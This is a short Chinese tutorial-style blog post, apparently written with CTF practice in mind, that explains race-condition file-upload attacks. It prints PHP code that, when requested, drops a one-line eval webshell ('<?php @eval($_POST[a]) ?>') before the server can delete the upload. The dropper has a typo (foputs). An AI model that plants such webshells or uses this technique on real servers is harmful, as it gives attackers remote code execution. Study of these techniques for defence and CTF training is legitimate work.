zoukankan      html  css  js  c++  java
  • 竞争条件攻击

    竞争条件攻击属于文件上传漏洞的一种。

    一些网站上传文件的逻辑是先允许上传文件,再检测文件中是否包含webshell的脚本,如果存在则删除webshell文件。

    但是攻击者可以利用上传文件和删除文件的时间差来完成文件上传漏洞攻击。

    攻击者可以上传类似代码hacker.php:

    <?php
      foputs(fopen('../shell.php','w'),'<?php @eval($_POST[a]) ?>');
    ?>

    访问文件时,文件代码会执行,在hacker.php文件所在目录下新建一个shell.php,内容即:

    <?php @eval($_POST[a]) ?>

    旧的webshell文件本来就只是一个垫脚石的存在,删不删除无所谓,我们利用新建的webshell文件可以进行漏洞攻击

    竞争条件攻击只试用于绕过后端的检测,对于绕过前端代码检测方法是没有用的。

    如果攻击者能讲两者很好得结合起来,说不定会有成效。

    [Sign]做不出ctf题的时候很痛苦,你只能眼睁睁看着其他人领先你
  • 相关阅读:
    C#中的Json序列化
    c#在sqlserver中使用EF框架
    Mvc中模拟模型
    localdb启动
    List泛型用法(半转载半原创)
    C#中真正的属性
    委托的简介、使用和简单事件
    类嵌套_list泛型_餐馆点菜例
    JavaIO
    JavaIO
  • 原文地址:https://www.cnblogs.com/echoDetected/p/12296235.html
Copyright © 2011-2022 走看看